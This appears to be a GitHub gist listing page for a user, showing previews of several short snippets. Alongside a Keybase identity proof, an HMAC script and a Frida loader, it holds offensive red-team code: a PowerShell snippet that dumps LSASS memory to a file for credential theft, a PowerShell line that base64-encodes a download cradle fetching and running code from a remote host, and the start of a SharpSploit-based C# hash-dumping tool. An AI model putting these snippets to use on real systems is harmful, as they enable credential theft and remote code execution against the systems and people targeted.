I hereby claim:
- I am t0w3ntum on github.
- I am t0w3ntum (https://keybase.io/t0w3ntum) on keybase.
- I have a public key whose fingerprint is 4753 72D7 AD1B 6C4B EBA7 B397 FED5 6B8C F90E 6B82
To claim this, I am signing this object:
$LSASSProc = Get-Process lsass | |
$FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create) | |
$Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero)) | |
$FileStream.Close() |
I hereby claim:
To claim this, I am signing this object:
import hashlib | |
import hmac | |
import sys | |
secret = sys.argv[2] | |
message = bytes(sys.argv[1]).encode('utf-8') | |
secret = bytes(secret).encode('utf-8') | |
hash = hmac.new(secret, message, hashlib.sha256) |
This program can be used to convert raw BGRA 8888 framebuffer to standard PNG file. |
import frida | |
import sys | |
scriptname = sys.argv[1] | |
procname = sys.argv[2] | |
fd = open(scriptname, "r") | |
def on_message(message, data): | |
print(message) | |
print(data) |
Verifying my Blockstack ID is secured with the address 12Xp1RVeuUfSnCyuEwpoSa8q8hXtAsKXzr https://explorer.blockstack.org/address/12Xp1RVeuUfSnCyuEwpoSa8q8hXtAsKXzr |
PS C:\Users\User> $Text = "IEX ((new-object net.webclient).downloadstring('http://10.10.8.101:8000/a'))" | |
PS C:\Users\User> $Bytes = [System.Text.Encoding]::Unicode.getBytes($Text) | |
PS C:\Users\User> $EncodedText = [Convert]::ToBase64String($Bytes) | |
PS C:\Users\User> $EncodedText |
using System; | |
using SharpSploit.Credentials; | |
using System.Management; | |
using System.IO; | |
class SMBDumpHash | |
{ | |
static void Main(string[] args) | |
{ | |
if (args.Length == 0) |